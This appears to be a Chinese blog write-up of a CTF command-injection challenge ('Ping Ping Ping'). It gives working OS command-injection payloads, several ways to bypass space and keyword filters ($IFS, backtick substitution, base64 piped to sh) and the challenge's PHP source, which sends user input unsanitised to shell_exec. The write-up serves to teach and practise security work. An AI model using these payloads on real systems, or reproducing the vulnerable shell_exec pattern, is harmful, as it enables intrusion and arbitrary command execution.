Ping Ping Ping—命令执行
打开创建好的环境发现提示/?ip=,第一反应应该是考命令执行
构造payload /?ip=127.0.0.1;ls
出现了flag.php,尝试读取它的内容。/?ip=127.0.0.1;cat flag.php
可以发现过滤了空格,接下来就是要绕过过滤,Liunx下常见的绕过空格方式有以下几种
cat$IFS$1flag.php//$1-$9都可以
cat${IFS}flag.php
{cat,flag.php}
cat<flag.php
cat<>flag.php
/?ip=127.0.0.1;cat$IFS$1flag.php
猜测它对flag这个关键字进行了过滤,先查看index.php里的内容
/?ip=
PING 127.0.0.1 (127.0.0.1): 56 data bytes
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");} else if(preg_match("/ /", $ip)){die("fxck your space!");} else if(preg_match("/bash/", $ip)){die("fxck your bash!");} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "
";print_r($a);
}?>
发现过滤了通配符等一系列字符,我们可以考虑使用``的形式来绕过正则限制
payload为/?ip=127.0.0.1;cat$IFS$1ls,反引号的作用是将命令的输出当做输入执行
右键查看源码,得到flag
另外一种解题思路
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
先对cat flag.php进行b64编码,在用base64 -d解码,最后在通过sh执行,最终执行的就是 cat flag.php
Ping Ping Ping—命令执行相关推荐
- TamronOS IPTV系统 ping 任意命令执行漏洞
TamronOS IPTV系统 ping 任意命令执行漏洞 目录 系统简介 漏洞描述 漏洞复现 总结 系统简介 TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商.酒店.学 ...
- 远程命令执行与代码执行(remote command/code execute)漏洞总结
文章目录 前言: 一.基础知识 1.命令执行漏洞 常用的命令连接符: 2.代码执行漏洞 3.PHP中的危险函数: 二.靶场练习 命令执行: 1.Low级别 2.Medium级别 3.High级别 4. ...
- 命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令.当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数. 比如PHP中的system,e ...
- Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞
Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec "ping" && exec "evel&q ...
- linux命令菜鸟ping,Linux ping命令
Linux ping命令 Linux ping命令用于检测主机. 执行ping指令会使用ICMP传输协议,发出要求回应的信息,若远端主机的网络功能没有问题,就会回应该信息,因而得知该主机运作正常. 语 ...
- 网络连通性测试ping和tracert命令
ping和tracert命令 Ping简介 Ping是基于ICMP协议实现的.通过从源端向目的端发送ICMP回显请求(Echo Request)报文后,根据是否收到目的端的ICMP回显应答(Echo ...
- ping服务器名位置解析,ping和ipconfig命令详解
ping是一个计算机网络工具,用来测试特定主机能否通过IP到达.ping的运作原理是向目标主机传出一个ICMP echo要求封包,等待接收echo回应封包.程序会按时间和反应成功的次数,估计失去封包率 ...
- 网络故障排查:Ping和Tracert命令
1.Ping和Tracert的用途 1.1 Ping和Tracert命令检查网络连接是否可达以及分析网络发生故障的位置.其中,Ping用于检查网络连接及主机是否可达:Tracert命令用于测试数据报文 ...
- php ping icmp,Linux_详解Linux系统中ping和arping命令的用法,pingping 程序使用 ICMP 协议的强 - phpStudy...
详解Linux系统中ping和arping命令的用法 pingping 程序使用 ICMP 协议的强制回显请求数据报以使主机或网关发送一份 ICMP 的回显应答.回显请求数据报(" ping ...
最新文章
- 并发编程专题——第二章(并发编程之Synchronized详解)
- 汇编中的字符串操作指令
- 树莓派应用实例4:环境温湿度测量(改进)
- 全球及中国烯丙基硫脲行业十四五需求产量及投资规模预测报告2022版
- 飞桨PaddlePaddle升级解读 | PaddleDetection物体检测统一框架
- 分成收益破5000后,我决定将付费专栏开源了
- mysql自增id用完了_MySQL表自增id用完了该怎么办?
- vs xaml 语句完成 自动列出成员_数据传输 | mysqldiff/mysqldbcompare 实现 DTLE 自动化测试...
- AI前沿线上大会,ALBERT一作、京东AI科学家等大咖亲临现场,限时免费,名额有限!...
- Jsp+Servlet+Mysql实现的在线图书商城源码
- jquery加载完成后方法只执行一次_JavaScript的超级库--jQuery内容整理(3)
- Postgres无法连接到服务器
- bokeh python_Python Bokeh数据可视化教程
- android radiogroup 底部菜单,Android底部菜单栏(RadioGroup+Fragment)美化
- 安装SQL Server 2012遇到“需要更新的以前的Visual Studio 2010实例.”
- Aliplayer自定义组件
- Mac环境配置MySQL(详细)
- Springboot整合kafka
- 海马体启发的记忆模型
- Python实现常用的假设检验